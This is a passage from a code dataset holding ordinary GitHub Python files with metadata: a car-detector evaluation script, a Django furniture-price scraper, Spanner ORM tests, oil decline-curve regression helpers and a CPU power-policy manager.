34, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.RETR_EXTERNAL", "line_number": 35, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_NONE", "line_number": 35, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 45, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "9331274425", "text": "from __future__ import print_function, division\nimport os\nimport torch\nfrom torchvision import datasets, transforms, utils\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom torch.utils.data import Dataset, DataLoader\nfrom PIL import Image, ImageDraw\nimport pandas as pd\nimport json\n\n# Define the dataset\nclass CarsDataset(Dataset):\n\n    def __init__(self, annos_path, data_dir, transform=None):\n        \"\"\"\n        Args:\n            annos_path (string): Path to the csv file with annotations.\n            data_dir (string): Directory with all the images.\n            transform (callable, optional): Optional transform to be applied\n                on a sample.\n        \"\"\"\n        self.car_details = pd.read_csv(annos_path)\n        self.car_details = np.array(self.car_details)\n\n        self.data_dir = data_dir\n        self.transform = transform\n\n    def __len__(self):\n        return len(self.car_details)\n\n    def __getitem__(self, idx):\n        img_name = os.path.join(self.data_dir, self.car_details[idx][0])\n        file_name = self.car_details[idx][0]\n        image = Image.open(img_name)\n        num_channel = len(image.split())\n        car_class = self.car_details[idx][5]\n        car_details = self.car_details[idx][6]\n        x1, y1, x2, y2 = self.car_details[idx][1], self.car_details[idx][2], self.car_details[idx][3], self.car_details[idx][4]\n        bounding_box = torch.as_tensor([[x1, y1, x2, y2]], dtype=torch.float32)\n        area = (bounding_box[:, 3] - bounding_box[:, 1]) * (bounding_box[:, 2] - bounding_box[:, 0])\n\n        # PyTorch's Faster R-CNN recognizes labels of 0 as background\n        if car_class == 0:\n            car_class = 196\n        \n        target = {}\n        target['boxes'] = bounding_box\n        target['labels'] = torch.as_tensor([car_class], dtype=torch.int64)\n        target['image_id'] = torch.as_tensor(idx)\n        target['area'] = area\n        target['iscrowd'] = torch.zeros(1, dtype=torch.int64)\n        \n        if self.transform:\n            image = self.transform(image)\n        \n        return image, target, car_details, file_name\n    \ndef compute_counts(preds, targets, iou_thr, score_thr):\n    # define counters for the number of true positives, false positives, and false negatives\n    TP = 0\n    FP = 0\n    FN = 0\n\n    # loop through all of the files\n    for pred_file, pred in preds.items():\n        # get the ground truths for each file\n        gts = targets[pred_file]\n\n        # reset the counter for the number of predictions and true positives for the image\n        num_preds = 0\n        tp = 0\n\n        # get the number of ground truths for the image\n        num_gt = len(gts['labels'])\n        # loop through each prediction for the image\n        for j in range(len(pred['labels'])):\n\n            # check if the score of the prediction exceeds the threshold\n            if (pred['scores'][j] >= score_thr):\n\n                # increment the number of predictions\n                num_preds += 1\n\n                # check to see if there are still ground truths to be matched\n                if tp < num_gt:\n\n                    # check to see if the label matches\n                    if (pred['labels'][j] == gts['labels'][0]):\n\n                        # compute the iou for the bounding boxes\n                        iou = compute_iou(pred['boxes'][j], gts['boxes'][0])\n                        \n                        #check to see if the iou exceeds the threshold\n                        if iou > iou_thr:\n                            tp += 1\n\n        # compute the number of false positives\n        fp = num_preds - tp\n\n        # compute the number of false negatives\n        fn = num_gt - tp\n\n        # update the overall counters\n        TP += tp\n        FP += fp\n        FN += fn\n\n    return TP, FP, FN\n\ndef compute_iou(box_1, box_2):\n    '''\n    This function takes a pair of bounding boxes and returns intersection-over-\n    union (IoU) of two bounding boxes.\n    '''\n    \n    # calculate the area of each box\n    area_1 = (box_1[2]-box_1[0])*(box_1[3]-box_1[1])\n    area_2 = (box_2[2]-box_2[0])*(box_2[3]-box_2[1])\n\n    # 
find the top left and bottom right corners of the intersection\n mins = np.amin([box_1,box_2],axis = 0)\n maxes = np.amax([box_1,box_2],axis = 0)\n\n i = np.concatenate((maxes[:2],mins[2:]), axis = None)\n \n # calculate the area of the intersection\n if (i[2] >= i[0]) and (i[3] >= i[1]):\n area_i = (i[2]-i[0])*(i[3]-i[1])\n else:\n area_i = 0\n\n # calculate the area of the union\n area_u = area_1 + area_2 - area_i\n\n # calculate iou\n iou = area_i/area_u\n\n assert (iou >= 0) and (iou <= 1.0)\n\n return iou\n\n# function for getting the precision and recall\ndef get_pr(preds, targets, iou_thrs, score_thrs):\n precision = []\n recall = []\n for iou_thr in iou_thrs:\n tp = np.zeros(len(score_thrs))\n fp = np.zeros(len(score_thrs))\n fn = np.zeros(len(score_thrs))\n for i, score_thr in enumerate(score_thrs):\n tp[i], fp[i], fn[i] = compute_counts(preds, targets, iou_thr=iou_thr, score_thr=score_thr)\n\n # get the total number of predictions and ground truths\n n_preds = tp + fp\n n_gt = tp + fn\n\n precision.append(tp/n_preds)\n recall.append(tp/n_gt)\n\n return precision, recall\n\n# Setup the paths\ntrain_path = './data/cars_train/'\ntest_path = './data/cars_test/'\ndevkit_path = './data/cars_devkit'\n\ntrain_annos_path = devkit_path + '/cars_train_annos.csv'\ntest_annos_path = devkit_path + '/cars_test_annos.csv'\ncars_meta_path = devkit_path + '/cars_meta.csv'\n\n# Load in the training and validation predictions and targets\ntrain_file_names = np.load('train_file_names.npy')\nwith open('train_preds.json','r') as f:\n train_preds = json.load(f)\nwith open('train_targets.json','r') as f:\n train_targets = json.load(f)\n\nval_file_names = np.load('val_file_names.npy')\nwith open('val_preds.json','r') as f:\n val_preds = json.load(f)\nwith open('val_targets.json','r') as f:\n val_targets = json.load(f)\n\n# get the precision and recall for the training and validation sets\nprecision_train, recall_train = get_pr(train_preds, train_targets, iou_thrs = [0.75], score_thrs = np.arange(0,1,0.01))\nprecision_val, recall_val = get_pr(val_preds, val_targets, iou_thrs = [0.75], score_thrs = np.arange(0,1,0.01))\n\n# plot training PR curve\nfor i in range(len(precision_train)):\n plt.figure(1)\n plt.plot(recall_train[i],precision_train[i])\n plt.xlim(0,1)\n plt.ylim(0,1)\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n plt.title('Training Set')\n\n# plot the validation PR curve\nfor i in range(len(precision_val)):\n plt.figure(2)\n plt.plot(recall_val[i],precision_val[i])\n plt.xlim(0,1)\n plt.ylim(0,1)\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n plt.title('Validation Set')\n\nplt.show()", "repo_name": "amoraru100/caltech-ee148-spring2020-project", "sub_path": "evaluate_detector.py", "file_name": "evaluate_detector.py", "file_ext": "py", "file_size_in_byte": 6849, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 13, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 35, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.as_tensor", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.float32", 
"line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.as_tensor", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torch.as_tensor", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 52, "usage_type": "attribute"}, {"api_name": "numpy.amin", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 173, "usage_type": "call"}, {"api_name": "json.load", "line_number": 175, "usage_type": "call"}, {"api_name": "json.load", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 179, "usage_type": "call"}, {"api_name": "json.load", "line_number": 181, "usage_type": "call"}, {"api_name": "json.load", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 192, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 194, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 207, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}]}
+{"seq_id": "33669377521", "text": "from django.shortcuts import render\nfrom .models import Couch\nfrom rest_framework import viewsets\nfrom .serializers import CouchSerializer\n\n\nclass CouchViewSet(viewsets.ModelViewSet):\n    queryset = Couch.objects.all()\n    serializer_class = CouchSerializer\n\ndef create_db(request):\n    import requests\n    from bs4 import BeautifulSoup as bs\n    from time import sleep\n\n    site_url = \"https://azbykamebeli.ru/catalog/0000057/\"\n    page = 1\n    all_items_urls = []\n\n    while True:\n        r = requests.get(f'{site_url}?page={page}')\n        print(r.url)\n        soup = bs(r.text, \"html.parser\")\n        data = soup.find_all('div', class_='item__title h4')\n        if not data:\n            break\n        for i in data:\n            all_items_urls.append(\"https://azbykamebeli.ru\" + i.a['href'])\n        page += 1\n        sleep(5)\n    clear_data = set(all_items_urls)\n    with open('urls.txt', 'a') as f:\n        for i in clear_data:\n            f.write(i + '\\n')\n\n    with open('urls.txt', 'r') as f:\n        text = f.read().splitlines()\n    for url in text:\n        r = requests.get(url)\n        soup = bs(r.text, \"html.parser\")\n\n        # get the article number and item id\n        data = soup.find('div', class_='align-self-start')\n        articul = data.find_all(\"span\")[0].get_text().split()[1]\n        id = data.find_all(\"span\")[1].get_text().split()[1]\n\n        # get the item name\n        name = soup.find('h1').get_text()\n        print(name)\n\n        # get the price with and without the discount\n        store_price_data = soup.find('a', class_='store-price fake-link').get_text().split()[:-1]\n        if store_price_data:\n            store_price = int(''.join(store_price_data))\n        else:\n            store_price = None\n\n        online_price_data = soup.find('div', class_='online-price').get_text().split()[:-1]\n        if online_price_data:\n            online_price = int(float(''.join(online_price_data)))\n        else:\n            online_price = None\n        print(online_price)\n\n        # status: available / made to order\n        data = soup.find('span', class_='d-inline-block badge-pre-order')\n        if data:\n            status = data.get_text()\n        else:\n            status = 'доступен'  # 'available'\n        Couch.objects.create(name = name, articul=articul, item_id = id, full_price = store_price,\n                             sale_price=online_price, status=status)\n        sleep(2)\n\n\ndef get_avg_price_by_articul(request):\n    from django.db.models import Avg\n\n    qs = Couch.objects.aggregate(Avg('full_price'))", "repo_name": "Vladgavr96/parser", "sub_path": "azbuka/stats/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2681, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 7, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 7, "usage_type": "name"}, {"api_name": "models.Couch.objects.all", "line_number": 8, "usage_type": "call"}, {"api_name": "models.Couch.objects", "line_number": 8, "usage_type": "attribute"}, {"api_name": "models.Couch", "line_number": 8, "usage_type": "name"}, {"api_name": "serializers.CouchSerializer", "line_number": 9, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 21, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 23, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 30, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 39, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 40, "usage_type": "call"}, {"api_name": "models.Couch.objects.create", "line_number": 71, "usage_type": "call"}, {"api_name": "models.Couch.objects", "line_number": 71, "usage_type": "attribute"}, {"api_name": "models.Couch", "line_number": 71, 
"usage_type": "name"}, {"api_name": "time.sleep", "line_number": 73, "usage_type": "call"}, {"api_name": "models.Couch.objects.aggregate", "line_number": 79, "usage_type": "call"}, {"api_name": "models.Couch.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "models.Couch", "line_number": 79, "usage_type": "name"}, {"api_name": "django.db.models.Avg", "line_number": 79, "usage_type": "call"}]}
+{"seq_id": "7593596293", "text": "import logging\nimport unittest\nfrom unittest import mock\n\nfrom spanner_orm import api\nfrom spanner_orm import error\nfrom spanner_orm.admin import api as admin_api\n\n\nclass ApiTest(unittest.TestCase):\n @mock.patch(\"google.cloud.spanner.Client\")\n def test_api_connection(self, client):\n connection = self.mock_connection(client)\n api.connect(\"\", \"\", \"\")\n self.assertEqual(api.spanner_api()._connection, connection)\n\n api.hangup()\n with self.assertRaises(error.SpannerError):\n api.spanner_api()\n\n def test_api_error_when_not_connected(self):\n with self.assertRaises(error.SpannerError):\n api.spanner_api()\n\n @mock.patch(\"google.cloud.spanner.Client\")\n def test_admin_api_connection(self, client):\n connection = self.mock_connection(client)\n admin_api.connect(\"\", \"\", \"\")\n self.assertEqual(admin_api.spanner_admin_api()._connection, connection)\n\n admin_api.hangup()\n with self.assertRaises(error.SpannerError):\n admin_api.spanner_admin_api()\n\n @mock.patch(\"google.cloud.spanner.Client\")\n def test_admin_api_create_ddl_connection(self, client):\n connection = self.mock_connection(client)\n admin_api.connect(\"\", \"\", \"\", create_ddl=[\"create ddl\"])\n self.assertEqual(admin_api.spanner_admin_api()._connection, connection)\n\n def mock_connection(self, client):\n connection = mock.Mock()\n client().instance().database.return_value = connection\n return connection\n\n\nif __name__ == \"__main__\":\n logging.basicConfig()\n unittest.main()\n", "repo_name": "maroux/python-spanner-orm", "sub_path": "spanner_orm/tests/api_test.py", "file_name": "api_test.py", "file_ext": "py", "file_size_in_byte": 1602, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "unittest.TestCase", "line_number": 10, "usage_type": "attribute"}, {"api_name": "spanner_orm.api.connect", "line_number": 14, "usage_type": "call"}, {"api_name": "spanner_orm.api", "line_number": 14, "usage_type": "name"}, {"api_name": "spanner_orm.api.spanner_api", "line_number": 15, "usage_type": "call"}, {"api_name": "spanner_orm.api", "line_number": 15, "usage_type": "name"}, {"api_name": "spanner_orm.api.hangup", "line_number": 17, "usage_type": "call"}, {"api_name": "spanner_orm.api", "line_number": 17, "usage_type": "name"}, {"api_name": "spanner_orm.error.SpannerError", "line_number": 18, "usage_type": "attribute"}, {"api_name": "spanner_orm.error", "line_number": 18, "usage_type": "name"}, {"api_name": "spanner_orm.api.spanner_api", "line_number": 19, "usage_type": "call"}, {"api_name": "spanner_orm.api", "line_number": 19, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 11, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 11, "usage_type": "name"}, {"api_name": "spanner_orm.error.SpannerError", "line_number": 22, "usage_type": "attribute"}, {"api_name": "spanner_orm.error", "line_number": 22, "usage_type": "name"}, {"api_name": "spanner_orm.api.spanner_api", "line_number": 23, "usage_type": "call"}, {"api_name": "spanner_orm.api", "line_number": 23, "usage_type": "name"}, {"api_name": "spanner_orm.admin.api.connect", "line_number": 28, "usage_type": "call"}, {"api_name": "spanner_orm.admin.api", "line_number": 28, "usage_type": "name"}, {"api_name": "spanner_orm.admin.api.spanner_admin_api", "line_number": 29, "usage_type": "call"}, {"api_name": "spanner_orm.admin.api", "line_number": 29, "usage_type": "name"}, {"api_name": 
"spanner_orm.admin.api.hangup", "line_number": 31, "usage_type": "call"}, {"api_name": "spanner_orm.admin.api", "line_number": 31, "usage_type": "name"}, {"api_name": "spanner_orm.error.SpannerError", "line_number": 32, "usage_type": "attribute"}, {"api_name": "spanner_orm.error", "line_number": 32, "usage_type": "name"}, {"api_name": "spanner_orm.admin.api.spanner_admin_api", "line_number": 33, "usage_type": "call"}, {"api_name": "spanner_orm.admin.api", "line_number": 33, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 25, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 25, "usage_type": "name"}, {"api_name": "spanner_orm.admin.api.connect", "line_number": 38, "usage_type": "call"}, {"api_name": "spanner_orm.admin.api", "line_number": 38, "usage_type": "name"}, {"api_name": "spanner_orm.admin.api.spanner_admin_api", "line_number": 39, "usage_type": "call"}, {"api_name": "spanner_orm.admin.api", "line_number": 39, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 35, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 35, "usage_type": "name"}, {"api_name": "unittest.mock.Mock", "line_number": 42, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 42, "usage_type": "name"}, {"api_name": "logging.basicConfig", "line_number": 48, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 49, "usage_type": "call"}]}
+{"seq_id": "71206786968", "text": "'''\nCreated on 21 Jul 2017\n\n@author: viniciusgs\n'''\n# Import a utility package for manipulating rate curves\n\nimport numpy as np\nfrom scipy.optimize import curve_fit\nimport bisect\nfrom scipy import stats\n\n\ndef ExponentialFit(time_array_in_years, opr_history):\n    bissection = SmartIntervalSearcher(opr_history)\n    x = time_array_in_years[bissection:]\n    y = opr_history.y[bissection:]\n    curve_fit_model = lambda x, a, b: a * np.exp(-b * x)\n    popt, pcov = curve_fit(curve_fit_model, x, y)\n    return popt[1]\n\n\ndef WCFitCoeff(wcut, opt):\n\n    if np.sum(wcut) < 0.01:\n        slope = 0\n        intercept = 0\n    else:\n        water_break_index = np.argwhere(wcut > 0)[0, 0] # Get the first position where WOR is > 0\n        new_wc, new_opt = np.array(wcut[water_break_index:]), np.array(opt[water_break_index:]) * 0.0062898\n        slope, intercept, r_value, p_value, slope_std_error = stats.linregress(new_opt, new_wc)\n\n    if r_value < 0.99:\n        ratio = float(len(new_wc)) / float(len(wcut))\n\n        if ratio > 0.1:\n\n            if ratio/2 > 0.1:\n                ration2_index = water_break_index + int(len(new_wc)/2)\n                new_wc, new_opt = np.array(wcut[ration2_index:]), np.array(opt[ration2_index:]) * 0.0062898\n                slope, intercept, r_value, p_value, slope_std_error = stats.linregress(new_opt, new_wc)\n\n                if r_value < 0.99:\n                    r90_index = int(0.9 * len(wcut))\n                    new_wc, new_opt = np.array(wcut[r90_index:]), np.array(opt[r90_index:]) * 0.0062898\n                    slope, intercept, r_value, p_value, slope_std_error = stats.linregress(new_opt, new_wc)\n\n    return slope, intercept\n\n\ndef WORFitCoeff(wor, opt):\n    if np.sum(wor) < 0.01:\n        popt = np.array([0.0, 0.0])\n\n    else:\n        position = np.argwhere(wor > 0)[0,0] # Get the first position where WOR is > 0\n        opt_cut = np.array(opt[position:]) * 0.0062898\n        wor_cut = np.array(wor[position:])\n        wor_log = np.log10(wor_cut)\n        wor_log_derivative = np.zeros(len(wor_log)-1)\n\n        for i in range(len(wor_log_derivative)):\n            wor_log_derivative[i] = (wor_log[i+1] - wor_log[i]) / (opt_cut[i+1] - opt_cut[i])\n\n        curve_average = np.average(wor_log_derivative)\n        curve_std_deviation = np.std(wor_log_derivative)\n\n        first_cut_position = 0\n        if curve_std_deviation > 0.2*curve_average:\n\n            first_cut_position = int(len(wor_log_derivative)/2)\n            wor_log_derivative = wor_log_derivative[first_cut_position:]\n            curve_average = np.average(wor_log_derivative)\n            curve_std_deviation = np.std(wor_log_derivative)\n\n            second_cut_position = 0\n            if curve_std_deviation > 0.2*curve_average and len(wor_log_derivative) > 0.2*len(wor_log):\n                second_cut_position = int(len(wor_log_derivative)/2)\n                wor_log_derivative = wor_log_derivative[second_cut_position:]\n                curve_average = np.average(wor_log_derivative)\n                curve_std_deviation = np.std(wor_log_derivative)\n\n        final_position = first_cut_position + second_cut_position\n\n        new_opt = opt_cut[final_position:]\n        np.putmask(new_opt, np.isinf(new_opt), 0)\n        new_wor = wor_log[final_position:]\n        np.putmask(new_wor, np.isinf(new_wor), 0)\n\n        curve_fit_model = lambda x,a,b: a * x + b\n        popt, pcov = curve_fit(curve_fit_model, new_opt, new_wor)\n\n    return popt.tolist()\n\n\ndef SmartIntervalSearcher(curve_to_be_analysed):\n    new_x_axis = np.empty(len(curve_to_be_analysed.x), dtype = np.datetime64('2015-01-01'))\n    derivative = np.zeros(len(curve_to_be_analysed.x))\n\n    for i,data in enumerate(curve_to_be_analysed.x):\n        new_x_axis[i] = np.datetime64(data.date)\n\n    if len(curve_to_be_analysed.x) > 20:\n        for i in range(len(curve_to_be_analysed)-1):\n            delta = (new_x_axis[i+1] - new_x_axis[i]) / 
np.timedelta64(1,'D')\n derivative[i] = (curve_to_be_analysed.y[i+1] - curve_to_be_analysed.y[i]) / delta\n\n position = 0\n for i in range(len(derivative)):\n if derivative[-2-i] < 0:\n pass\n else:\n position = len(derivative) - i + 2\n break\n\n if position > 0.9*len(curve_to_be_analysed.x):\n if int(0.9*len(curve_to_be_analysed.x)) < 20:\n position = len(curve_to_be_analysed.x) - 20\n else:\n position = int(0.9*len(curve_to_be_analysed.x))\n else:\n position = 0\n\n return position\n", "repo_name": "ESSS/kraken-macros", "sub_path": "src/macros/dca/dcacore/regression.py", "file_name": "regression.py", "file_ext": "py", "file_size_in_byte": 4575, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 18, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.exp", "line_number": 18, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "scipy.stats.linregress", "line_number": 31, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 31, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "scipy.stats.linregress", "line_number": 41, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 41, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "scipy.stats.linregress", "line_number": 46, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 46, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.putmask", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.isinf", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.putmask", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.isinf", "line_number": 88, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.datetime64", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.datetime64", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.timedelta64", "line_number": 105, "usage_type": "call"}]}
+{"seq_id": "12357274253", "text": "import ddcmpolicy\nimport logging\n\n\nlogger = logging.getLogger('nrm')\n\n\nclass PowerPolicyManager:\n    \"\"\" Used for power policy application \"\"\"\n\n    def __init__(self, cpus=None, policy=None, damper=1000000000,\n                 slowdown=1.1):\n        self.cpus = cpus\n        self.policy = policy\n        self.damper = damper\n        self.slowdown = slowdown\n\n        # Initialize all power interfaces\n        self.ddcmpolicy = ddcmpolicy.DDCMPolicy()\n\n        # Power levels\n        self.maxdclevel = self.ddcmpolicy.maxdclevel\n        # TODO: Need to set this value when DVFS policies are added\n        self.maxfreqlevel = -1\n        self.dclevel = dict.fromkeys(self.cpus, self.maxdclevel)\n        self.freqlevel = dict.fromkeys(self.cpus, self.maxfreqlevel)\n\n        # Book-keeping\n        self.damperexits = 0\n        self.slowdownexits = 0\n        self.prevtolalphasetime = dict.fromkeys(self.cpus, None)\n\n    def run_policy(self, phase_contexts):\n        # Run only if policy is specified\n        if self.policy:\n            for id in phase_contexts:\n                if id not in self.cpus:\n                    logger.info(\"\"\"Attempt to change power of cpu not in container\n                        : %r\"\"\", id)\n                    return\n                # Select and invoke appropriate power policy\n                # TODO: Need to add a better policy selection logic in addition\n                # to user specified using manifest file\n                ret, value = self.execute(id, **phase_contexts[id])\n                if self.policy == 'DDCM':\n                    if ret == 'DDCM':\n                        self.dclevel[id] = value\n                    # In case of slowdown experienced by even one process, reset all\n                    # cpus\n                    if ret == 'SLOWDOWN':\n                        self.reset_all()\n                phase_contexts[id]['set'] = False\n\n    def execute(self, cpu, **kwargs):\n        computetime = kwargs['computetime']\n        totalphasetime = kwargs['totaltime']\n\n        # If the current phase length is less than the damper value, then do\n        # not use policy. This avoids use of policy during startup operation and\n        # insignificant phases\n        if totalphasetime < self.damper:\n            self.damperexits += 1\n            return 'DAMPER', -1\n\n        # If the current phase has slowed down beyond the threshold set, then\n        # reset power. 
This helps correct error in policy application or acts\n # as a rudimentary way to detect phase change\n if(self.prevtolalphasetime[cpu] is not None and totalphasetime >\n self.slowdown * self.prevtolalphasetime[cpu]):\n self.ddcmpolicy.dc.reset(cpu)\n newdclevel = self.ddcmpolicy.maxdclevel\n\n # Reset value for next phase\n self.prevtolalphasetime[cpu] = totalphasetime\n\n return 'SLOWDOWN', newdclevel\n\n # Invoke the correct policy based on operation module\n if self.policy == \"DDCM\":\n newdclevel = self.ddcmpolicy.execute(cpu, self.dclevel[cpu],\n computetime, totalphasetime)\n # Reset value for next phase\n self.prevtolalphasetime[cpu] = totalphasetime\n\n # TODO: Add DVFS and Combined policies\n\n return 'DDCM', newdclevel\n\n def print_policy_stats(self, resetflag=False):\n # Get statistics for policy run\n ppstats = dict()\n ppstats['PowerPolicyDamperExits'] = self.damperexits\n ppstats['PowerPolicySlowdownExits'] = self.slowdownexits\n ppstats.update(self.ddcmpolicy.print_stats(resetflag))\n if resetflag:\n self.damperexits = 0\n self.slowdownexits = 0\n\n return ppstats\n\n def power_reset(self, cpu):\n # Reset power control\n self.ddcmpolicy.dc.reset(cpu)\n\n # Reset value\n self.dclevel[cpu] = self.maxdclevel\n\n def power_check(self, cpu):\n # Check status of all power controls\n return self.ddcmpolicy.dc.check(cpu)\n\n def reset_all(self):\n # Reset all cpus\n for cpu in self.cpus:\n self.power_reset(cpu)\n", "repo_name": "anlsys/nrm-legacy", "sub_path": "nrm/powerpolicy.py", "file_name": "powerpolicy.py", "file_ext": "py", "file_size_in_byte": 4145, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 5, "usage_type": "call"}, {"api_name": 